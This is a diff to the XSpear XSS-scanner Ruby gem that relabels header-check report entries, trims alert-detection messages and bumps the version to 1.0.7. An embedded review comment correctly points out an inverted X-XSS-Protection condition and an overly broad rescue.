data/lib/XSpear.rb CHANGED
@@ -78,28 +78,28 @@ class XspearScan
78
78
  def run
79
79
  if !@response['Server'].nil?
80
80
  # Server header
81
- @report.add_issue("i","s","-","-","original query","Found Server: #{@response['Server']}")
81
+ @report.add_issue("i","s","-","-","<original query>","Found Server: #{@response['Server']}")
82
82
  end
83
83
 
84
84
  if @response['Strict-Transport-Security'].nil?
85
85
  # HSTS
86
- @report.add_issue("i","s","-","-","original query","Not set HSTS")
86
+ @report.add_issue("i","s","-","-","<original query>","Not set HSTS")
87
87
  end
88
88
 
89
89
 
90
90
  if !@response['Content-Type'].nil?
91
- @report.add_issue("i","s","-","-","original query","Content-Type: #{@response['Content-Type']}")
91
+ @report.add_issue("i","s","-","-","<original query>","Content-Type: #{@response['Content-Type']}")
92
92
  end
93
93
 
94
94
 
95
95
  if !@response['X-XSS-Protection'].nil?
96
- @report.add_issue("i","s","-","-","original query","Not set X-XSS-Protection")
96
+ @report.add_issue("i","s","-","-","<original query>","Not set X-XSS-Protection")
97
97
  end
98
98
 
99
99
  if !@response['X-Frame-Options'].nil?
100
- @report.add_issue("i","s","-","-","original query","X-Frame-Options: #{@response['X-Frame-Options']}")
100
+ @report.add_issue("i","s","-","-","<original query>","X-Frame-Options: #{@response['X-Frame-Options']}")
101
101
  else
102
- @report.add_issue("l","s","-","-","original query","Not Set X-Frame-Options")
102
+ @report.add_issue("l","s","-","-","<original query>","Not Set X-Frame-Options")
103
103
  end
104
104
 
105
105
 
@@ -112,12 +112,12 @@ class XspearScan
112
112
  d = c.split " "
113
113
  r = r+d[0]+" "
114
114
  end
115
- @report.add_issue("i","s","-","-","original query","Set CSP(#{r})")
115
+ @report.add_issue("i","s","-","-","<original query>","Set CSP(#{r})")
116
116
  rescue
117
- @report.add_issue("i","s","-","-","original query","CSP ERROR")
117
+ @report.add_issue("i","s","-","-","<original query>","CSP ERROR")
118
118
  end
119
119
  else
120
- @report.add_issue("m","s","-","-","original query","Not Set CSP")
120
+ @report.add_issue("m","s","-","-","<original query>","Not Set CSP")
121
121
  end
122
122
 
123
123
 
@@ -172,17 +172,17 @@ class XspearScan
172
172
  alert = driver.switch_to().alert()
173
173
  if alert.text.to_s == "45"
174
174
  driver.quit
175
- return [true, "found alert/prompt/confirm (45) in selenium!! #{@query}\n => "]
175
+ return [true, "found alert/prompt/confirm (45) in selenium!! #{@query}"]
176
176
  else
177
177
  driver.quit
178
- return [true, "found alert/prompt/confirm event in selenium #{@query}\n =>"]
178
+ return [true, "found alert/prompt/confirm event in selenium #{@query}"]
179
179
  end
180
180
  rescue Selenium::WebDriver::Error::UnexpectedAlertOpenError => e
181
181
  driver.quit
182
- return [true, "found alert/prompt/confirm error base in selenium #{@query}\n =>"]
182
+ return [true, "found alert/prompt/confirm error base in selenium #{@query}"]
183
183
  rescue => e
184
184
  driver.quit
185
- return [false, "not found alert/prompt/confirm event #{@query}\n =>"]
185
+ return [false, "not found alert/prompt/confirm event #{@query}"]
186
186
  end
187
187
  end
188
188
  rescue => e
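Review bot: In the first hunk of this file the X-XSS-Protection branch (`if !@response['X-XSS-Protection'].nil?`) reports `Not set X-XSS-Protection` exactly when the header is present, the inverse of the X-Frame-Options branch just below it, which reports the header value when set and `Not Set X-Frame-Options` otherwise; the commit only retouches the payload label on that line and leaves the inverted condition, so this static-analysis finding is wrong in both directions. The condition should read `if @response['X-XSS-Protection'].nil?`, and an `else` arm reporting the header's value would make it consistent with the X-Frame-Options handling. In the last hunk, the bare `rescue => e` that returns `not found alert/prompt/confirm event` also turns any driver or navigation failure into a negative result, so a scan error is indistinguishable from a genuine non-finding; at minimum log `e` there. The `run` method begins in the first hunk but its body continues outside all three hunks.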
metadata CHANGED
@@ -1,7 +1,7 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: XSpear
3
3
  version: !ruby/object:Gem::Version
4
- version: 1.0.6
4
+ version: 1.0.7
5
5
  platform: ruby
6
6
  authors:
7
7
  - hahwul